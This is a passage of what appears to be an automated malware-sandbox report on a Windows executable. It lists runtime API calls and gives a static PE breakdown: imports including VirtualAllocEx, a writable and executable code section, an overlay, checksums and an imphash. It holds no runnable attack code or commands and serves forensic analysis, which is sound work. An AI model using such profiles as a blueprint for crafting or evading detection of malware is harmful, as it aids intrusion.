  2159. "ws2_32.dll.WSARecv",
  2160. "ncrypt.dll.SslOpenProvider",
  2161. "ncrypt.dll.GetSChannelInterface",
  2162. "bcryptprimitives.dll.GetHashInterface",
  2163. "ncrypt.dll.SslIncrementProviderReferenceCount",
  2164. "ncrypt.dll.SslImportKey",
  2165. "bcryptprimitives.dll.GetCipherInterface",
  2166. "ncrypt.dll.SslLookupCipherSuiteInfo",
  2167. "ncrypt.dll.BCryptOpenAlgorithmProvider",
  2168. "ncrypt.dll.BCryptGetProperty",
  2169. "ncrypt.dll.BCryptCreateHash",
  2170. "ncrypt.dll.BCryptHashData",
  2171. "ncrypt.dll.BCryptFinishHash",
  2172. "ncrypt.dll.BCryptDestroyHash",
  2173. "crypt32.dll.CertGetCertificateChain",
  2174. "userenv.dll.GetUserProfileDirectoryW",
  2175. "sechost.dll.ConvertStringSidToSidW",
  2176. "userenv.dll.RegisterGPNotification",
  2177. "gpapi.dll.RegisterGPNotificationInternal",
  2178. "cryptsp.dll.CryptAcquireContextA",
  2179. "cryptsp.dll.CryptCreateHash",
  2180. "cryptsp.dll.CryptHashData",
  2181. "cryptsp.dll.CryptVerifySignatureA",
  2182. "cryptsp.dll.CryptDestroyKey",
  2183. "cryptsp.dll.CryptDestroyHash",
  2184. "bcryptprimitives.dll.GetAsymmetricEncryptionInterface",
  2185. "ncrypt.dll.BCryptImportKeyPair",
  2186. "ncrypt.dll.BCryptVerifySignature",
  2187. "ncrypt.dll.BCryptDestroyKey",
  2188. "crypt32.dll.CertVerifyCertificateChainPolicy",
  2189. "crypt32.dll.CertFreeCertificateChain",
  2190. "crypt32.dll.CertDuplicateCertificateContext",
  2191. "ncrypt.dll.SslEncryptPacket",
  2192. "ncrypt.dll.SslDecryptPacket",
  2193. "winsta.dll.WinStationEnumerateW",
  2194. "winsta.dll.WinStationFreeMemory",
  2195. "qmgr.dll.ServiceMain",
  2196. "bitsigd.dll.InitializeEx",
  2197. "upnp.dll.DllGetClassObject",
  2198. "upnp.dll.DllCanUnloadNow",
  2199. "rpcrt4.dll.RpcStringBindingComposeA",
  2200. "rpcrt4.dll.RpcBindingFromStringBindingA",
  2201. "rpcrt4.dll.RpcStringFreeA",
  2202. "oleaut32.dll.DllGetClassObject",
  2203. "oleaut32.dll.DllCanUnloadNow",
  2204. "sxs.dll.SxsOleAut32MapIIDToProxyStubCLSID",
  2205. "advapi32.dll.RegQueryValueW",
  2206. "oleaut32.dll.BSTR_UserSize",
  2207. "oleaut32.dll.BSTR_UserMarshal",
  2208. "oleaut32.dll.BSTR_UserUnmarshal",
  2209. "oleaut32.dll.BSTR_UserFree",
  2210. "oleaut32.dll.VARIANT_UserSize",
  2211. "oleaut32.dll.VARIANT_UserMarshal",
  2212. "oleaut32.dll.VARIANT_UserUnmarshal",
  2213. "oleaut32.dll.VARIANT_UserFree",
  2214. "oleaut32.dll.LPSAFEARRAY_UserSize",
  2215. "oleaut32.dll.LPSAFEARRAY_UserMarshal",
  2216. "oleaut32.dll.LPSAFEARRAY_UserUnmarshal",
  2217. "oleaut32.dll.LPSAFEARRAY_UserFree",
  2218. "advapi32.dll.LogonUserW",
  2219. "sspicli.dll.LogonUserExExW",
  2220. "wtsapi32.dll.WTSQueryUserToken",
  2221. "advapi32.dll.QueryAllTracesW",
  2222. "ole32.dll.CoRegisterClassObject",
  2223. "iphlpapi.dll.GetAdaptersAddresses",
  2224. "rpcrt4.dll.UuidFromStringW",
  2225. "radarrs.dll.WdiDiagnosticModuleMain",
  2226. "radarrs.dll.WdiHandleInstance",
  2227. "radarrs.dll.WdiGetDiagnosticModuleInterfaceVersion"
  2228. ]
  2229.  
  2230. [*] Static Analysis: {
  2231. "pe": {
  2232. "peid_signatures": null,
  2233. "imports": [
  2234. {
  2235. "imports": [
  2236. {
  2237. "name": "GetCurrentThread",
  2238. "address": "0x40a014"
  2239. },
  2240. {
  2241. "name": "GetOEMCP",
  2242. "address": "0x40a018"
  2243. },
  2244. {
  2245. "name": "GetTickCount",
  2246. "address": "0x40a01c"
  2247. },
  2248. {
  2249. "name": "GetProcAddress",
  2250. "address": "0x40a020"
  2251. },
  2252. {
  2253. "name": "LoadLibraryA",
  2254. "address": "0x40a024"
  2255. },
  2256. {
  2257. "name": "GetLastError",
  2258. "address": "0x40a028"
  2259. },
  2260. {
  2261. "name": "GetCommandLineW",
  2262. "address": "0x40a02c"
  2263. },
  2264. {
  2265. "name": "GetProcessHeap",
  2266. "address": "0x40a030"
  2267. },
  2268. {
  2269. "name": "InterlockedIncrement",
  2270. "address": "0x40a034"
  2271. },
  2272. {
  2273. "name": "lstrlenA",
  2274. "address": "0x40a038"
  2275. },
  2276. {
  2277. "name": "GetVersionExA",
  2278. "address": "0x40a03c"
  2279. },
  2280. {
  2281. "name": "GetVersionExW",
  2282. "address": "0x40a040"
  2283. },
  2284. {
  2285. "name": "InterlockedDecrement",
  2286. "address": "0x40a044"
  2287. },
  2288. {
  2289. "name": "GetCommandLineA",
  2290. "address": "0x40a048"
  2291. },
  2292. {
  2293. "name": "VirtualAllocEx",
  2294. "address": "0x40a04c"
  2295. },
  2296. {
  2297. "name": "GetCurrentProcess",
  2298. "address": "0x40a050"
  2299. },
  2300. {
  2301. "name": "GetModuleHandleA",
  2302. "address": "0x40a054"
  2303. },
  2304. {
  2305. "name": "GetStartupInfoW",
  2306. "address": "0x40a058"
  2307. }
  2308. ],
  2309. "dll": "KERNEL32.dll"
  2310. },
  2311. {
  2312. "imports": [
  2313. {
  2314. "name": "DefWindowProcW",
  2315. "address": "0x40a068"
  2316. },
  2317. {
  2318. "name": "LoadStringW",
  2319. "address": "0x40a06c"
  2320. },
  2321. {
  2322. "name": "SetActiveWindow",
  2323. "address": "0x40a070"
  2324. },
  2325. {
  2326. "name": "ReleaseCapture",
  2327. "address": "0x40a074"
  2328. },
  2329. {
  2330. "name": "CreateWindowExA",
  2331. "address": "0x40a078"
  2332. },
  2333. {
  2334. "name": "GetMenuStringW",
  2335. "address": "0x40a07c"
  2336. },
  2337. {
  2338. "name": "UnregisterClassA",
  2339. "address": "0x40a080"
  2340. },
  2341. {
  2342. "name": "DestroyWindow",
  2343. "address": "0x40a084"
  2344. },
  2345. {
  2346. "name": "RegisterClassW",
  2347. "address": "0x40a088"
  2348. },
  2349. {
  2350. "name": "SendMessageW",
  2351. "address": "0x40a08c"
  2352. },
  2353. {
  2354. "name": "CreateWindowExW",
  2355. "address": "0x40a090"
  2356. },
  2357. {
  2358. "name": "SetWindowLongW",
  2359. "address": "0x40a094"
  2360. },
  2361. {
  2362. "name": "LoadIconA",
  2363. "address": "0x40a098"
  2364. }
  2365. ],
  2366. "dll": "USER32.dll"
  2367. },
  2368. {
  2369. "imports": [
  2370. {
  2371. "name": "RegOpenKeyExW",
  2372. "address": "0x40a000"
  2373. },
  2374. {
  2375. "name": "RegOpenKeyExA",
  2376. "address": "0x40a004"
  2377. }
  2378. ],
  2379. "dll": "ADVAPI32.dll"
  2380. },
  2381. {
  2382. "imports": [
  2383. {
  2384. "name": "ImageList_Add",
  2385. "address": "0x40a00c"
  2386. }
  2387. ],
  2388. "dll": "COMCTL32.dll"
  2389. },
  2390. {
  2391. "imports": [
  2392. {
  2393. "name": "SetupDecompressOrCopyFileA",
  2394. "address": "0x40a060"
  2395. }
  2396. ],
  2397. "dll": "SETUPAPI.dll"
  2398. },
  2399. {
  2400. "imports": [
  2401. {
  2402. "name": "_exit",
  2403. "address": "0x40a0a0"
  2404. },
  2405. {
  2406. "name": "_c_exit",
  2407. "address": "0x40a0a4"
  2408. },
  2409. {
  2410. "name": "_cexit",
  2411. "address": "0x40a0a8"
  2412. },
  2413. {
  2414. "name": "exit",
  2415. "address": "0x40a0ac"
  2416. },
  2417. {
  2418. "name": "_wcmdln",
  2419. "address": "0x40a0b0"
  2420. },
  2421. {
  2422. "name": "__wgetmainargs",
  2423. "address": "0x40a0b4"
  2424. },
  2425. {
  2426. "name": "_initterm",
  2427. "address": "0x40a0b8"
  2428. },
  2429. {
  2430. "name": "__setusermatherr",
  2431. "address": "0x40a0bc"
  2432. },
  2433. {
  2434. "name": "_adjust_fdiv",
  2435. "address": "0x40a0c0"
  2436. },
  2437. {
  2438. "name": "__p__commode",
  2439. "address": "0x40a0c4"
  2440. },
  2441. {
  2442. "name": "__p__fmode",
  2443. "address": "0x40a0c8"
  2444. },
  2445. {
  2446. "name": "__set_app_type",
  2447. "address": "0x40a0cc"
  2448. },
  2449. {
  2450. "name": "_controlfp",
  2451. "address": "0x40a0d0"
  2452. },
  2453. {
  2454. "name": "__dllonexit",
  2455. "address": "0x40a0d4"
  2456. },
  2457. {
  2458. "name": "_onexit",
  2459. "address": "0x40a0d8"
  2460. },
  2461. {
  2462. "name": "_except_handler3",
  2463. "address": "0x40a0dc"
  2464. },
  2465. {
  2466. "name": "_XcptFilter",
  2467. "address": "0x40a0e0"
  2468. }
  2469. ],
  2470. "dll": "msvcrt.dll"
  2471. }
  2472. ],
  2473. "digital_signers": null,
  2474. "exported_dll_name": null,
  2475. "actual_checksum": "0x0002d30a",
  2476. "overlay": {
  2477. "size": "0x00001f00",
  2478. "offset": "0x00025000"
  2479. },
  2480. "imagebase": "0x00400000",
  2481. "reported_checksum": "0x0002d30a",
  2482. "icon_hash": null,
  2483. "entrypoint": "0x004083d6",
  2484. "timestamp": "2019-06-12 20:02:55",
  2485. "osversion": "4.0",
  2486. "sections": [
  2487. {
  2488. "name": ".text",
  2489. "characteristics": "IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_SHARED|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE",
  2490. "virtual_address": "0x00001000",
  2491. "size_of_data": "0x00008000",
  2492. "entropy": "5.82",
  2493. "raw_address": "0x00001000",
  2494. "virtual_size": "0x000076b6",
  2495. "characteristics_raw": "0xf0000020"
  2496. },
  2497. {
  2498. "name": ".bss",
  2499. "characteristics": "IMAGE_SCN_CNT_UNINITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE",
  2500. "virtual_address": "0x00009000",
  2501. "size_of_data": "0x00000000",
  2502. "entropy": "0.00",
  2503. "raw_address": "0x00000000",
  2504. "virtual_size": "0x00000030",
  2505. "characteristics_raw": "0xc0000080"
  2506. },
  2507. {
  2508. "name": ".rdata",
  2509. "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ",
  2510. "virtual_address": "0x0000a000",
  2511. "size_of_data": "0x00001000",
  2512. "entropy": "2.39",
  2513. "raw_address": "0x00009000",
  2514. "virtual_size": "0x0000061c",
  2515. "characteristics_raw": "0x40000040"
  2516. },
  2517. {
  2518. "name": ".data",
  2519. "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_SHARED|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE",
  2520. "virtual_address": "0x0000b000",
  2521. "size_of_data": "0x0001a000",
  2522. "entropy": "6.12",
  2523. "raw_address": "0x0000a000",
  2524. "virtual_size": "0x00019d54",
  2525. "characteristics_raw": "0xd0000040"
  2526. },
  2527. {
  2528. "name": ".reloc",
  2529. "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_DISCARDABLE|IMAGE_SCN_MEM_READ",
  2530. "virtual_address": "0x00025000",
  2531. "size_of_data": "0x00001000",
  2532. "entropy": "0.68",
  2533. "raw_address": "0x00024000",
  2534. "virtual_size": "0x0000025c",
  2535. "characteristics_raw": "0x42000040"
  2536. }
  2537. ],
  2538. "resources": [],
  2539. "dirents": [
  2540. {
  2541. "virtual_address": "0x00000000",
  2542. "name": "IMAGE_DIRECTORY_ENTRY_EXPORT",
  2543. "size": "0x00000000"
  2544. },
  2545. {
  2546. "virtual_address": "0x0000a104",
  2547. "name": "IMAGE_DIRECTORY_ENTRY_IMPORT",
  2548. "size": "0x0000008c"
  2549. },
  2550. {
  2551. "virtual_address": "0x00000000",
  2552. "name": "IMAGE_DIRECTORY_ENTRY_RESOURCE",
  2553. "size": "0x00000000"
  2554. },
  2555. {
  2556. "virtual_address": "0x00000000",
  2557. "name": "IMAGE_DIRECTORY_ENTRY_EXCEPTION",
  2558. "size": "0x00000000"
  2559. },
  2560. {
  2561. "virtual_address": "0x00025000",
  2562. "name": "IMAGE_DIRECTORY_ENTRY_SECURITY",
  2563. "size": "0x00001f00"
  2564. },
  2565. {
  2566. "virtual_address": "0x00025000",
  2567. "name": "IMAGE_DIRECTORY_ENTRY_BASERELOC",
  2568. "size": "0x00000118"
  2569. },
  2570. {
  2571. "virtual_address": "0x00000000",
  2572. "name": "IMAGE_DIRECTORY_ENTRY_DEBUG",
  2573. "size": "0x00000000"
  2574. },
  2575. {
  2576. "virtual_address": "0x00000000",
  2577. "name": "IMAGE_DIRECTORY_ENTRY_COPYRIGHT",
  2578. "size": "0x00000000"
  2579. },
  2580. {
  2581. "virtual_address": "0x00000000",
  2582. "name": "IMAGE_DIRECTORY_ENTRY_GLOBALPTR",
  2583. "size": "0x00000000"
  2584. },
  2585. {
  2586. "virtual_address": "0x00000000",
  2587. "name": "IMAGE_DIRECTORY_ENTRY_TLS",
  2588. "size": "0x00000000"
  2589. },
  2590. {
  2591. "virtual_address": "0x00000000",
  2592. "name": "IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG",
  2593. "size": "0x00000000"
  2594. },
  2595. {
  2596. "virtual_address": "0x00000000",
  2597. "name": "IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT",
  2598. "size": "0x00000000"
  2599. },
  2600. {
  2601. "virtual_address": "0x0000a000",
  2602. "name": "IMAGE_DIRECTORY_ENTRY_IAT",
  2603. "size": "0x000000e8"
  2604. },
  2605. {
  2606. "virtual_address": "0x00000000",
  2607. "name": "IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT",
  2608. "size": "0x00000000"
  2609. },
  2610. {
  2611. "virtual_address": "0x00000000",
  2612. "name": "IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR",
  2613. "size": "0x00000000"
  2614. },
  2615. {
  2616. "virtual_address": "0x00000000",
  2617. "name": "IMAGE_DIRECTORY_ENTRY_RESERVED",
  2618. "size": "0x00000000"
  2619. }
  2620. ],
  2621. "exports": [],
  2622. "guest_signers": {},
  2623. "imphash": "7e4334085562a74ad98ab8806ba673ef",
  2624. "icon_fuzzy": null,
  2625. "icon": null,
  2626. "pdbpath": null,
  2627. "imported_dll_count": 6,
  2628. "versioninfo": []
  2629. }
  2630. }